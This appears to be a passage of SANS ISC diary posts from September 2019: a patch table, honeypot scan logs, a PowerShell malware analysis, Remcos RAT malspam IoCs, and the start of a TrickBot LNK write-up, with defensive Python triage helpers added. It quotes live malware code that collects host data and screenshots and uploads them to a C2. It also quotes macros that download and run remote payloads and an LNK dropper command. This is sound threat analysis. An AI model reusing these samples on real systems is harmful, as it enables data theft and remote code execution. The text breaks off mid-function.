| Jet Database Engine Remote Code Execution Vulnerability | CVE-2019-1250 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| LNK Remote Code Execution Vulnerability | CVE-2019-1280 | No | No | Less Likely | Less Likely | Critical | 7.3 | 6.6 |
| Latest Servicing Stack Updates | ADV990001 | No | No | - | - | Critical | | |
| Lync 2013 Information Disclosure Vulnerability | CVE-2019-1209 | No | No | - | - | Important | | |
| Microsoft Browser Security Feature Bypass Vulnerability | CVE-2019-1220 | No | No | Less Likely | Less Likely | Important | 2.4 | 2.2 |
| Microsoft Compatibility Appraiser Elevation of Privilege Vulnerability | CVE-2019-1267 | No | No | Less Likely | Less Likely | Important | 7.3 | 6.6 |
| Microsoft Edge based on Edge HTML Information Disclosure Vulnerability | CVE-2019-1299 | No | No | - | - | Important | 4.3 | 3.9 |
| Microsoft Excel Information Disclosure Vulnerability | CVE-2019-1263 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Excel Remote Code Execution Vulnerability | CVE-2019-1297 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Exchange Denial of Service Vulnerability | CVE-2019-1233 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Exchange Spoofing Vulnerability | CVE-2019-1266 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Graphics Components Information Disclosure Vulnerability | CVE-2019-1283 | No | No | - | - | Important | 5.5 | 5.0 |
| Microsoft Office Security Feature Bypass Vulnerability | CVE-2019-1264 | No | No | - | - | Important | | |
| Microsoft Office SharePoint XSS Vulnerability | CVE-2019-1262 | No | No | - | - | Important | | |
| Microsoft SharePoint Elevation of Privilege Vulnerability | CVE-2019-1260 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft SharePoint Remote Code Execution Vulnerability | CVE-2019-1257 | No | No | More Likely | More Likely | Critical | | |
| Microsoft SharePoint Remote Code Execution Vulnerability | CVE-2019-1295 | No | No | More Likely | More Likely | Critical | | |
| Microsoft SharePoint Remote Code Execution Vulnerability | CVE-2019-1296 | No | No | More Likely | More Likely | Critical | | |
| Microsoft SharePoint Spoofing Vulnerability | CVE-2019-1259 | No | No | - | - | Moderate | | |
| Microsoft SharePoint Spoofing Vulnerability | CVE-2019-1261 | No | No | Less Likely | Less Likely | Important | | |
| Microsoft Windows Store Installer Elevation of Privilege Vulnerability | CVE-2019-1270 | No | No | Less Likely | Less Likely | Important | 6.3 | 5.7 |
| Microsoft Yammer Security Feature Bypass Vulnerability | CVE-2019-1265 | No | No | Less Likely | Less Likely | Important | | |
| Remote Desktop Client Remote Code Execution Vulnerability | CVE-2019-0787 | No | No | More Likely | More Likely | Critical | 7.5 | 6.7 |
| Remote Desktop Client Remote Code Execution Vulnerability | CVE-2019-0788 | No | No | More Likely | More Likely | Critical | 7.5 | 6.7 |
| Remote Desktop Client Remote Code Execution Vulnerability | CVE-2019-1290 | No | No | More Likely | More Likely | Critical | 7.5 | 6.7 |
| Remote Desktop Client Remote Code Execution Vulnerability | CVE-2019-1291 | No | No | More Likely | More Likely | Critical | 7.5 | 6.7 |
| Rome SDK Information Disclosure Vulnerability | CVE-2019-1231 | No | No | Less Likely | Less Likely | Important | | |
| Scripting Engine Memory Corruption Vulnerability | CVE-2019-1221 | No | No | - | - | Critical | 6.4 | 5.8 |
| September 2019 Adobe Flash Security Update | ADV190022 | No | No | Less Likely | Less Likely | Critical | | |
| Team Foundation Server Cross-site Scripting Vulnerability | CVE-2019-1305 | No | No | Less Likely | Less Likely | Important | | |
| VBScript Remote Code Execution Vulnerability | CVE-2019-1208 | No | No | Less Likely | Less Likely | Critical | 6.4 | 5.8 |
| VBScript Remote Code Execution Vulnerability | CVE-2019-1236 | No | No | Less Likely | Less Likely | Critical | 6.4 | 5.8 |
| Win32k Elevation of Privilege Vulnerability | CVE-2019-1256 | No | No | More Likely | Unlikely | Important | 7.8 | 7.0 |
| Win32k Elevation of Privilege Vulnerability | CVE-2019-1285 | No | No | More Likely | More Likely | Important | 7.8 | 7.0 |
| Windows ALPC Elevation of Privilege Vulnerability | CVE-2019-1269 | No | No | Less Likely | Less Likely | Important | 6.3 | 5.7 |
| Windows ALPC Elevation of Privilege Vulnerability | CVE-2019-1272 | No | No | Less Likely | Less Likely | Important | 6.3 | 5.7 |
| Windows Audio Service Elevation of Privilege Vulnerability | CVE-2019-1277 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Windows Common Log File System Driver Elevation of Privilege Vulnerability | CVE-2019-1214 | No | Yes | More Likely | Unlikely | Important | 7.8 | 7.0 |
| Windows Common Log File System Driver Information Disclosure Vulnerability | CVE-2019-1282 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| Windows Denial of Service Vulnerability | CVE-2019-1292 | No | No | Less Likely | Less Likely | Important | 5.8 | 5.2 |
| Windows Elevation of Privilege Vulnerability | CVE-2019-1215 | No | Yes | More Likely | More Likely | Important | 7.8 | 7.0 |
| Windows Elevation of Privilege Vulnerability | CVE-2019-1253 | Yes | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Windows Elevation of Privilege Vulnerability | CVE-2019-1278 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Windows Elevation of Privilege Vulnerability | CVE-2019-1303 | No | No | Less Likely | Less Likely | Important | | |
| Windows GDI Information Disclosure Vulnerability | CVE-2019-1252 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| Windows GDI Information Disclosure Vulnerability | CVE-2019-1286 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| Windows Hyper-V Denial of Service Vulnerability | CVE-2019-0928 | No | No | - | - | Important | 5.4 | 4.9 |
| Windows Hyper-V Information Disclosure Vulnerability | CVE-2019-1254 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| Windows Kernel Information Disclosure Vulnerability | CVE-2019-1274 | No | No | Less Likely | Less Likely | Important | 6.3 | 5.7 |
| Windows Media Elevation of Privilege Vulnerability | CVE-2019-1271 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.3 |
| Windows Network Connectivity Assistant Elevation of Privilege Vulnerability | CVE-2019-1287 | No | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Windows SMB Client Driver Information Disclosure Vulnerability | CVE-2019-1293 | No | No | Less Likely | Less Likely | Important | 5.5 | 5.0 |
| Windows Secure Boot Security Feature Bypass Vulnerability | CVE-2019-1294 | Yes | No | Less Likely | Less Likely | Important | 5.3 | 4.8 |
| Windows Text Service Framework Elevation of Privilege Vulnerability | CVE-2019-1235 | Yes | No | Less Likely | Less Likely | Important | 7.8 | 7.0 |
| Windows Transaction Manager Information Disclosure Vulnerability | CVE-2019-1219 | No | No | More Likely | More Likely | Important | 5.5 | 5.0 |
| Windows Update Delivery Optimization Elevation of Privilege Vulnerability | CVE-2019-1289 | No | No | Less Likely | Less Likely | Important | 7.0 | 6.3 |
| Winlogon Elevation of Privilege Vulnerability | CVE-2019-1268 | No | No | Less Likely | Less Likely | Important | 6.5 | 5.9 |

Total Vulnerabilities: 79

--
Renato Marinho
Morphus Labs | LinkedIn | Twitter

10 September 2019

ISC Stormcast For Tuesday, September 10th 2019 https://isc.sans.edu/podcastdetail.html?id=6658, (Tue, Sep 10th)

9 September 2019

ISC Stormcast For Monday, September 9th 2019 https://isc.sans.edu/podcastdetail.html?id=6656, (Mon, Sep 9th)

7 September 2019

Unidentified Scanning Activity, (Sat, Sep 7th)

Over the past two weeks, my honeypot has captured a new scan. According to the URL targeted and some research, this might be used to identify Dahua[1] or HiSilicon[2] digital video recorder (DVR) products. So far I have only seen this activity against port 80, and the scans look like this:

20190907-090937: 192.168.25.9:80-XXX.190.6.228:48968 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'
20190907-093912: 192.168.25.9:80-XXX.188.126.243:36847 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'
20190907-094441: 192.168.25.9:80-XXX.189.237.44:44343 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'
20190907-100443: 192.168.25.9:80-XXX.188.40.103:35067 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'
20190907-115225: 192.168.25.9:80-XXX.177.116.123:40904 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'
20190907-115630: 192.168.25.9:80-XX.186.174.54:57636 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'
20190907-122646: 192.168.25.9:80-XXX.189.27.141:38624 data 'GET ../../mnt/custom/ProductDefinition HTTP\r\n\r\n'

If you are seeing this kind of activity and are able to help identify the product targeted, or confirm it is one of the two I listed, leave a comment on our page. I did find an exploit against a HiSilicon DVR, released last year, when searching for the same URL[3].

[1] https://www.dahuasecurity.com/
[2] http://www.hisilicon.com
[3] https://www.exploit-db.com/exploits/44004

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

6 September 2019

PowerShell Script with a builtin DLL, (Fri, Sep 6th)

Attackers are always trying to bypass antivirus detection by using new techniques to obfuscate their code. I recently found a bunch of scripts that encode part of their code in Base64. The code is decoded at execution time and executed via IEX (Invoke-Expression):

iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("...Base64-data...")))

Another technique used by malware developers is to load a malicious DLL into the running PowerShell process. Yes, PowerShell can do awesome stuff. Yesterday, I spotted a script that splits its malicious code across the two techniques: one part of the code is Base64 encoded, but some functions are called directly from a DLL loaded at run time.

First, the blob is Base64 decoded and gunzipped (at most 20480 bytes are read into the buffer), then loaded into the PowerShell process as a .NET assembly:

$Z4GoLn = New-Object IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String("..."), [IO.Compression.CompressionMode]::Decompress)
$joqOfPjY = New-Object byte[](20480)
$Z4GoLn.Read($joqOfPjY, 0, 20480) | Out-Null
[System.Reflection.Assembly]::Load($joqOfPjY) | Out-Null
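As an added defender-side example (not the diary's code), the Python script below statically recovers the literals handed to FromBase64String, applies the same gunzip step the script performs, and reports whether the result looks like a PE/.NET assembly together with its SHA256, so the embedded DLL can be hashed and looked up without ever calling Assembly.Load. The script text and the fake assembly bytes it is run against are constructed for the demo.

```python
"""Static triage of a PowerShell script carrying a Base64 (optionally gzip) payload.
Added example, not the diary's code. Recovers the embedded DLL without executing
the script, so it can be hashed and looked up instead of loaded via Assembly.Load."""
import base64
import gzip
import hashlib
import re

# Matches the string literal handed to [Convert]::FromBase64String("...")
B64_RE = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=\s]{40,})"')


def extract_payloads(script: str) -> list:
    """Return one triage record per Base64 literal found in the script."""
    records = []
    for blob in B64_RE.findall(script):
        raw = base64.b64decode(re.sub(r"\s", "", blob))
        try:
            # The script wraps the bytes in a GzipStream(Decompress); do the same statically.
            payload, packing = gzip.decompress(raw), "gzip"
        except (OSError, EOFError):
            payload, packing = raw, "none"          # plain IEX-style text stage
        records.append({
            "packing": packing,
            "size": len(payload),
            "is_pe": payload[:2] == b"MZ",           # DOS header magic
            "is_dotnet": b"BSJB" in payload,         # CLR metadata signature
            "sha256": hashlib.sha256(payload).hexdigest(),
        })
    return records


# --- constructed sample: a fake .NET image, NOT a real assembly -----------------
FAKE_DLL = (b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x00" * 60 + b"BSJB"
            + b"\x00" * 64 + b"constructed stand-in for the embedded DLL")
STAGE_TEXT = b"Write-Host 'constructed stage-2 text, not real malware'"

# Constructed script text mimicking the two techniques described in the diary.
SAMPLE_SCRIPT = (
    'iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("'
    + base64.b64encode(STAGE_TEXT).decode() + '")))\n'
    '$Z4GoLn = New-Object IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String("'
    + base64.b64encode(gzip.compress(FAKE_DLL)).decode()
    + '"), [IO.Compression.CompressionMode]::Decompress)\n'
    "[System.Reflection.Assembly]::Load($joqOfPjY) | Out-Null\n"
)

if __name__ == "__main__":
    for rec in extract_payloads(SAMPLE_SCRIPT):
        print(rec)
```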

Once the DLL is loaded, it's now possible to call all functions provided by the library. This is achieved by referencing the custom type and the method ("[custom.type]::method()"):

[QE7K9ZJvi46.QE7K9ZJvi46]::p9Dq()

You can find all the functions in the DLL using your favourite disassembler:

**************************************************************
*                          FUNCTION                          *
**************************************************************
void p9Dq-57-8272()
     void      <VOID>     <RETURN>
                     p9Dq-57-8272
0040205c 28 06           SUB   byte ptr [ESI],AL
0040205e 00 00           ADD   byte ptr [EAX],AL
00402060 0a 6f 07        OR    CH,byte ptr [EDI + 0x7]
00402063 00 00           ADD   byte ptr [EAX],AL
00402065 0a 0a           OR    CL,byte ptr [EDX]
00402067 28 08           SUB   byte ptr [EAX],CL
00402069 00 00           ADD   byte ptr [EAX],AL
0040206b 0a 6f 09        OR    CH,byte ptr [EDI + 0x9]
0040206e 00 00           ADD   byte ptr [EAX],AL
00402070 0a 6f 0a        OR    CH,byte ptr [EDI + 0xa]
00402073 00 00           ADD   byte ptr [EAX],AL
00402075 0a 17           OR    DL,byte ptr [EDI]
00402077 8d 0e           LEA   ECX,[ESI]
00402079 00 00           ADD   byte ptr [EAX],AL
0040207b 01 13           ADD   dword ptr [EBX],EDX
0040207d 04 11           ADD   AL,0x11
0040207f 04 16           ADD   AL,0x16
00402081 1f              POP   DS
00402082 2d 9d 11 04 6f  SUB   EAX,0x6f04119d
00402087 0b 00           OR    EAX,dword ptr [EAX]

What does the malware do? First, it collects information about the infected host:

function kvhLZVVHv40() {
    # Is the host domain-joined?
    if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN)) {
        $HmHCMAj1gp = "DOMAIN: NO`n`n"
    } else {
        $HmHCMAj1gp = "DOMAIN: YES`n`n"
    }
    # Host, network, process, user and AV inventory, concatenated into one text blob
    $HmHCMAj1gp += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n")
    $HmHCMAj1gp += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n")
    $HmHCMAj1gp += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n")
    $HmHCMAj1gp += "`n`nNETVIEW:`n`n" + ((net view) -join "`n")
    $HmHCMAj1gp += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n")
    $HmHCMAj1gp += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n")
    $HmHCMAj1gp += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n")
    $HmHCMAj1gp += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n")
    $HmHCMAj1gp += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String)
    $HmHCMAj1gp += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName
    # Hand the UTF-8 bytes to the upload routine (message type 0)
    $V6VCS = [System.Text.Encoding]::UTF8.GetBytes($HmHCMAj1gp)
    PMQty 0 $V6VCS
}

Collected data are sent to a C2:

function PMQty([int]$Wg94, [byte[]]$V6VCS) {
    # Build the URL: C2 host from $F36ui, path generated by the DLL
    $sdo7g = "https://$F36ui/" + [QE7K9ZJvi46.QE7K9ZJvi46]::EA2gkql9ya($Wg94, 0, $true)
    # Encode the payload with another DLL function, then POST it
    $hwv80v = [QE7K9ZJvi46.QE7K9ZJvi46]::BPizrD($V6VCS)
    (New-Object System.Net.WebClient).UploadData($sdo7g, $hwv80v)
}

The C2 address is stored as a Base64-encoded IP address, and the DLL function EA2gkql9ya() generates random URIs like:

hxxps://23[.]227[.]193[.]48/ddqxyg/g1/cbahpbp1y/im/g/asg/3izld2/2s5kq5xexs4h5mwc/xr51fqv2p/4zm/e.jpg

Using the same technique, the malware exfiltrates the content of the following registry keys (related to different versions of Outlook):

  • hkcu:\Software\Microsoft\Office\16.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*
  • hkcu:\Software\Microsoft\Office\15.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*
  • hkcu:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\*

What else could be interesting? A screen capture of the desktop! Here is the function that takes the screenshot:

function cY0yMOo7U3() {
    Add-Type -Assembly System.Windows.Forms
    # Capture the whole virtual screen into a bitmap
    $Ze8Fpb5KC = [Windows.Forms.SystemInformation]::VirtualScreen
    $Rpmv5HB = New-Object Drawing.Bitmap $Ze8Fpb5KC.Width, $Ze8Fpb5KC.Height
    $ntkkayAduow = [Drawing.Graphics]::FromImage($Rpmv5HB)
    $ntkkayAduow.CopyFromScreen($Ze8Fpb5KC.Location, [Drawing.Point]::Empty, $Ze8Fpb5KC.Size)
    $ntkkayAduow.Dispose()
    # Encode it as JPEG (quality 40) into a memory stream
    $UkzcuaUqgj = New-Object System.IO.MemoryStream
    $noFMcdA6cKj=40
    $hwv80voderParams = New-Object System.Drawing.Imaging.EncoderParameters
    $hwv80voderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $noFMcdA6cKj)
    $OmDwFp = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" }
    $Rpmv5HB.save($UkzcuaUqgj, $OmDwFp, $hwv80voderParams)
    $Rpmv5HB.Dispose()
    # Base64-encode and hand off to the upload routine (message type 2)
    $V6VCS = [convert]::ToBase64String($UkzcuaUqgj.ToArray())
    $V6VCS = [System.Text.Encoding]::ASCII.GetBytes($V6VCS)
    PMQty 2 $V6VCS
}

Once the initial data have been exfiltrated, the malware enters a loop. It queries the C2 at random intervals:

Start-Sleep -s (Get-Random -Input @(200..260))

Depending on the C2 answer, the malware performs the following tasks:

  • Execute the provided PowerShell code and send results back (remote code execution)
  • Dump a DLL on disk with a random name
  • Dump a PE on disk with a random name and execute it

Unfortunately, the C2 is down at the moment, so I can't grab the DLL/PE files.

The script (SHA256:9d315c1ba1d6a10c06fe0b7d12a31ec519b973403ccf01fb36584ce9750e1d6b) has a very low VT score (3/57)[1].
The DLL (SHA256:18580a1789d26c123f3c41fe23f2085de7650a177fdb2623704b748de4403bf3) has a score of 6/71[2].

[1] https://www.virustotal.com/gui/file/9d315c1ba1d6a10c06fe0b7d12a31ec519b973403ccf01fb36584ce9750e1d6b/detection
[2] https://www.virustotal.com/gui/file/18580a1789d26c123f3c41fe23f2085de7650a177fdb2623704b748de4403bf3/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

September 6, 2019.

ISC Stormcast For Friday, September 6th 2019 https://isc.sans.edu/podcastdetail.html?id=6654, (Fri, Sep 6th)

September 5, 2019.

Private IP Addresses in Malware Samples?, (Thu, Sep 5th)

I'm looking for some samples on VT that contain URLs with private or non-routable IP addresses (RFC1918)[1]. I found one recently and it made me curious: why would malware try to connect to a non-routable IP address?

Here is an example of a macro found in a suspicious Word document (SHA256: c5226e407403b37d36e306f644c3b8fde50c085e273c897ff3f36a23ca0f1c6a)[2]: 

Sub AutoOpen()
'
' test Macro
'
'
x = URLDownloadToFileA(0, "http://10.200.235.200:/loader.dll", Environ("TEMP") & "\loader.dll", 0, 0)
End Sub

This one seems to be under development and does not look too dangerous. But wait: the use of VirusTotal can be very sensitive depending on your context, and submitting files to VirusTotal must be done carefully. If you are a Blue-teamer, uploading a sample might ring a bell at the attacker and let them know that you're looking at them. If you're a Red-teamer, uploading your self-made sample might help AV vendors improve their detection mechanisms.

Here is another one, found in another document with a higher VT score (22/57)[3]:

Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
    strCommand = "powershell iex (New-Object Net.WebClient).DownloadString('http://172.16.17.22/PowerUpDev.ps1')"
    Set WshShell = CreateObject("WScript.Shell")
    Set WshShellExec = WshShell.Exec(strCommand)
    strOutput = WshShellExec.StdOut.ReadAll
    MsgBox strOutput
End Sub

Besides classic macros, I also found a lot of DLLs and DEX files (Dalvik Executables from Android applications) that contain URLs with RFC1918 IP addresses. I think that most of them are samples still being tested or developed.
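As an added example (not part of the diary), here is a small Python triage helper that pulls IP-literal URLs out of a sample's strings and sorts them into RFC1918, other reserved/non-routable, and public; it is run on the two macro strings quoted above plus one constructed URL in a documentation range, and handles the empty port seen in the first macro.

```python
"""Flag IP-literal URLs in extracted strings that point at RFC1918 or other
non-routable space. Added example, not the diary's code."""
import ipaddress
import re

# IPv4 literal, optional (possibly empty) port as in "10.200.235.200:/loader.dll", optional path
URL_RE = re.compile(r"""https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d*)?(?:/[^\s'"()]*)?""", re.I)
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def classify(ip_text: str) -> str:
    """rfc1918 / other-reserved (loopback, link-local, doc ranges, ...) / public / invalid."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return "invalid"
    if any(ip in net for net in RFC1918):
        return "rfc1918"
    return "public" if ip.is_global else "other-reserved"


def scan_sample(text: str) -> list:
    """Return (url, ip, class) for each IP-literal URL; RFC1918 hits usually mean a
    sample still under test, or one written for a specific internal network."""
    return [(m.group(0), m.group(1), classify(m.group(1))) for m in URL_RE.finditer(text)]


# Constructed input: the two macro lines quoted in the diary plus one URL in the
# 203.0.113.0/24 documentation range (reserved, but not RFC1918).
SAMPLE_TEXT = """
x = URLDownloadToFileA(0, "http://10.200.235.200:/loader.dll", Environ("TEMP") & "\\loader.dll", 0, 0)
strCommand = "powershell iex (New-Object Net.WebClient).DownloadString('http://172.16.17.22/PowerUpDev.ps1')"
$u = 'http://203.0.113.10/constructed.bin'
"""

if __name__ == "__main__":
    for url, ip, kind in scan_sample(SAMPLE_TEXT):
        print(f"{kind:15} {ip:16} {url}")
```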

[1] https://tools.ietf.org/html/rfc1918
[2] https://www.virustotal.com/gui/file/c5226e407403b37d36e306f644c3b8fde50c085e273c897ff3f36a23ca0f1c6a/detection
[3] https://www.virustotal.com/gui/file/cdd3bdced038414f84c318fdc4b2e6573e99900fb792dd417869721cc7975b84/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

September 5, 2019.

ISC Stormcast For Thursday, September 5th 2019 https://isc.sans.edu/podcastdetail.html?id=6652, (Thu, Sep 5th)

September 4, 2019.

ISC Stormcast For Wednesday, September 4th 2019 https://isc.sans.edu/podcastdetail.html?id=6650, (Wed, Sep 4th)

September 4, 2019.

Malspam using password-protected Word docs to push Remcos RAT, (Wed, Sep 4th)

Introduction

Malicious spam (malspam) using attached password-protected Word documents to evade detection is nothing new.  I've documented it as early as March 2017, and this style of malware distribution started years before then.  This particular campaign has pushed a variety of malware, including IcedID (Bokbot), various types of ransomware, and Nymaim.  This diary from 2018 has a list of different types of malware seen from this campaign during that year.

At times, this resume-themed malspam can disappear for several weeks, but I always see it return.  This most recent wave began as early as Wednesday 2019-08-28.  When I checked on Tuesday 2019-09-03, this infection chain pushed Remcos RAT.

Today's diary reviews characteristics of this infection chain.

Malspam

Recent malspam looks similar to a diary I wrote in March 2019 and a blog I posted almost two months later in May.  This time, the sending addresses were all probably spoofed, and they all end with @t-online.de.  Attachment names all end with resume.doc.  I've pasted the dates, times, sending addresses, subject lines, and attachment names here.


Shown above:  Dates, times, senders, subject lines, and attachment names for recent malspam from this campaign.

I was not able to find an example of the malspam from this most recent wave of emails; however, the image below shows what these emails typically look like.


Shown above:  What this malspam typically looks like.

Attached Word documents

The attached Word documents use 123 as the password.  These Word documents have macros, and the visual template looks remarkably similar to previous examples I've reviewed.


Shown above:  Recent example of an attached Word document from this malspam campaign.  The password is 123


Shown above:  The Word document after it is unlocked by the password.

Infection traffic

Infection traffic was similar to what I've seen before from this campaign.  First was an HTTP request that returned a Windows executable file.  In this case, the initial URL ended in .jpg.  This was followed by post-infection traffic over TCP ports 2404 and 2405.  When I ran the same Word document through an Any.Run sandbox, it also generated two DNS queries not seen during my infection traffic.


Shown above:  Traffic from an infection in my lab, filtered in Wireshark.


Shown above:  The initial HTTP request returned a Windows executable file.


Shown above:  Post-infection traffic generated by Remcos RAT (1 of 2).


Shown above:  Post-infection traffic generated by Remcos RAT (2 of 2).


Shown above:  Traffic caused by running the Word document in the Any.Run sandbox (link).

Forensics on the infected Windows host

The initial Windows executable (EXE) file was saved to the user's AppData\Local\Temp directory.  It generated an EXE that was slightly over 400 MB, which kept Remcos RAT persistent on the infected Windows host.  This Remcos RAT sample also updated the Windows registry to stay persistent after a reboot.


Shown above:  Windows executable files associated with this Remcos RAT infection.


Shown above:  Remcos RAT persistent on the infected Windows host.


Shown above:  Windows registry updates caused by this Remcos RAT sample.

Indicators of Compromise (IoCs)

Infection traffic:

  • 104.244.74[.]243 port 80 - 104.244.74[.]243 - GET /pine.jpg
  • 37.19.193[.]217 port 2404 - encoded TCP traffic caused by Remcos RAT
  • 37.19.193[.]217 port 2405 - encoded TCP traffic caused by Remcos RAT
  • 209.141.40[.]183 port 2404 - toptoptop3[.]online - attempted TCP connection (caused by Remcos RAT)
  • 209.141.40[.]183 port 2404 - toptoptop3[.]site - attempted TCP connection (caused by Remcos RAT)

Associated files:

SHA256 hash: 932505acc15faede0993285532ed6d5afb27ce1c591a0819653ea5813d11cd55

  • File size: 37,752 bytes
  • File name: Takisha resume.doc
  • File description: Password-protected Word doc -- Password: 123

SHA256 hash: fa9a94b32f7fa1e1e3eef63d3fb9003fda8d295e1f1a3e521691725e4c7da9f3

  • File size: 1,064,960 bytes
  • File location: hxxp://104.244.74[.]243/pine.jpg
  • File location: C:\Users\[username]\AppData\Local\Temp\distanc1e.exe
  • File description: initial installer EXE for Remcos RAT, retrieved by macro from the above Word doc

SHA256 hash: c866c269cd1617ee739216e24ba7cd1b392684b441bcdf10a6c0fdba073fbc28

  • File size: 400,749,569 bytes
  • File location: C:\Users\[username]\AppData\Local\Temp\IXP000.TMP\REMCOS~4.EXE (deleted itself)
  • File location: C:\Users\[username]\Jos5\FO.exe
  • File description: Remcos RAT

Final words

Remcos RAT is not the only malware distributed by this campaign.  In previous months, other families of malware have been seen from this malspam, most recently IcedID (Bokbot).  Detection rates on the attached Word documents are very low, since they are encrypted and use password protection.  However, spam filters and proper system administrative practices like Software Restriction Policies (SRP) or AppLocker will easily prevent these types of infections on Windows-based systems.

Pcap and malware for this diary can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

September 3, 2019.

[Guest Diary] Tricky LNK points to TrickBot, (Tue, Sep 3rd)

[This is a guest diary submitted by Jan Kopriva. Jan is working for Alef Nula (http://www.alef.com) and you can follow him on Twitter at @jk0pr]

Recently, I was asked to analyze a phishing e-mail which was sent to one of our customers. The e-mail itself was a run-of-the-mill affair (a variation on the “you have unpaid invoices, click here to download them” theme), but the link it contained pointed to a quite interesting file. The file in question was a ZIP archive containing an unusually large (almost 10 kB) LNK file trying to look like an RTF document.
 

At the time of the original analysis, both the ZIP and LNK files were detected as malicious by 2/59 AV engines according to VirusTotal, while at the time of writing it was 19/59 for the shortcut file and 18/59 for the archive file.
The target set in the LNK shortcut was:

%comspec% /v:on /c hwqcG & if not exist tPUQl (set "fChXE=inds") & (f!fChXE!tr "LMpJG.*" OutstandingPayment.lnk > "%tmp%\NWrfK.vbs" & "%tmp%\NWrfK.vbs") & qFctA

It contains some elementary obfuscation, which makes it harder to read at first, but if we clean it up, it basically comes down to:

cmd.exe /c findstr "LMpJG.*" OutstandingPayment.lnk > "%tmp%\NWrfK.vbs" & "%tmp%\NWrfK.vbs"

In other words, it will try to find the string “LMpJG” in the LNK file itself, save this string and everything after it in a file named NWrfK.vbs in the Temp directory and then execute this file. If we look for the string “LMpJG” in our LNK file manually, we will discover why the shortcut file seemed so unusually large – it indeed contains (obfuscated) VBScript code.

Before we take a look at the VBS code itself, we should mention how this is possible. Windows doesn’t care (or rather doesn’t care too much – there are some caveats) if you append arbitrary bytes after the end of an otherwise well-formed LNK file. If you try to execute such a shortcut, the OS simply disregards the extra content. This allows the shortcut file we have here to act as a dropper for a VBS file. Although it is not a new technique – this and other types of malicious LNKs have been used in phishing campaigns for a long time – it isn’t as common as many others, and thus not many are aware of the dangers of malicious LNKs (i.e., if you teach any security awareness courses, mentioning the topic of malicious LNKs when you discuss potentially dangerous e-mail attachments might not be a bad idea).
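Added example, not from the guest diary: a minimal Python walk of the MS-SHLLINK structures (header, optional LinkTargetIDList and LinkInfo, StringData, ExtraData) that reports whatever bytes follow the terminal block, which is exactly the space this dropper uses. build_lnk() constructs a toy shortcut for the demo and is not a real sample.

```python
"""Report bytes appended after the last structure of a .lnk file (MS-SHLLINK overlay).
Added example, not from the diary. A shortcut still works with trailing data, which
is what lets the LNK carry the VBScript that findstr later extracts."""
import struct

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # 00021401-0000-0000-C000-000000000046
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FLAGS = (0x04, 0x08, 0x10, 0x20, 0x40)   # Name, RelativePath, WorkingDir, Arguments, IconLocation


def lnk_overlay(data: bytes) -> bytes:
    """Walk the ShellLink structures and return everything after the TerminalBlock."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink header")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
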